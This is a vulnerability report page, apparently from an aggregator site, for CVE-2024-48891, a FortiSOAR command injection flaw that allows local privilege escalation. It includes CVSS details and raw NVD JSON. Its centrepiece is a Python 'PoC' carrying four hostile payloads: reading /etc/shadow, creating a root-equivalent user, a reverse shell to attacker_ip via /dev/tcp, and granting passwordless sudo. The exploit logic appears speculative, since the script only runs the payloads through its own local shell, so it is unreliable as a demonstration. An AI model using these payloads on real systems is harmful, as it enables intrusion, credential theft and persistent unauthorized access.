Security Vulnerability Report
中文
CVE-2024-48891 CVSS 7.0 HIGH

CVE-2024-48891

Published: 2025-10-14 16:15:36
Last Modified: 2025-10-15 17:36:33
Source: [email protected]

Description

An Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability [CWE-78] in FortiSOAR 7.6.0 through 7.6.1, 7.5.0 through 7.5.1, 7.4 all versions, 7.3 all versions may allow an attacker who has already obtained a non-login low privileged shell access (via another hypothetical vulnerability) to perform a local privilege escalation via crafted commands.

CVSS Details

CVSS Score
7.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortisoar:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortisoar:*:*:*:*:*:*:*:* - VULNERABLE
FortiSOAR 7.3(全版本)
FortiSOAR 7.4(全版本)
FortiSOAR 7.5.0 至 7.5.1
FortiSOAR 7.6.0 至 7.6.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2024-48891 - FortiSOAR OS Command Injection PoC (Local Privilege Escalation) # This PoC demonstrates the concept of exploiting OS command injection in FortiSOAR # Note: Requires prior low-privileged shell access to the FortiSOAR system #!/usr/bin/env python3 import subprocess import sys def exploit_command_injection(injected_command): """ Exploit OS command injection in FortiSOAR vulnerable endpoint. The vulnerability exists in command execution functions that fail to properly sanitize special shell characters. """ # Vulnerable pattern: user input is concatenated directly into shell command # without proper escaping or parameterization vulnerable_command = f"/opt/fortisoar/bin/fortisoar-cli execute --action 'system_info' --param '{injected_command}'" try: # Execute the crafted command - the injected payload will run with # elevated privileges of the FortiSOAR service process result = subprocess.run( vulnerable_command, shell=True, capture_output=True, text=True, timeout=30 ) return result.stdout, result.stderr except subprocess.TimeoutExpired: return None, "Command timed out" except Exception as e: return None, str(e) def main(): # Example payloads demonstrating privilege escalation via command injection # Payload 1: Read sensitive system files payload_read = "; cat /etc/shadow #" # Payload 2: Create a new root user payload_user = "; useradd -o -u 0 -g 0 -M -d /root -s /bin/bash pwned; echo 'pwned:password123' | chpasswd #" # Payload 3: Establish reverse shell with elevated privileges payload_revshell = "; bash -i >& /dev/tcp/attacker_ip/4444 0>&1 #" # Payload 4: Modify sudoers for persistent access payload_sudo = "; echo 'attacker ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers #" if len(sys.argv) > 1: payload = sys.argv[1] else: payload = payload_read print(f"[*] Exploiting CVE-2024-48891 with payload: {payload}") stdout, stderr = exploit_command_injection(payload) if stdout: print(f"[+] Output:\n{stdout}") if stderr: print(f"[-] Error:\n{stderr}") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-48891", "sourceIdentifier": "[email protected]", "published": "2025-10-14T16:15:35.503", "lastModified": "2025-10-15T17:36:33.173", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability [CWE-78] in FortiSOAR 7.6.0 through 7.6.1, 7.5.0 through 7.5.1, 7.4 all versions, 7.3 all versions may allow an attacker who has already obtained a non-login low privileged shell access (via another hypothetical vulnerability) to perform a local privilege escalation via crafted commands."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisoar:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.3.0", "versionEndExcluding": "7.5.2", "matchCriteriaId": "AB556BB9-A061-45DD-AB46-C583B7CB5108"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisoar:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.2", "matchCriteriaId": "199DD7C5-D5B3-4B53-9BF0-DE974A092508"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-24-412", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.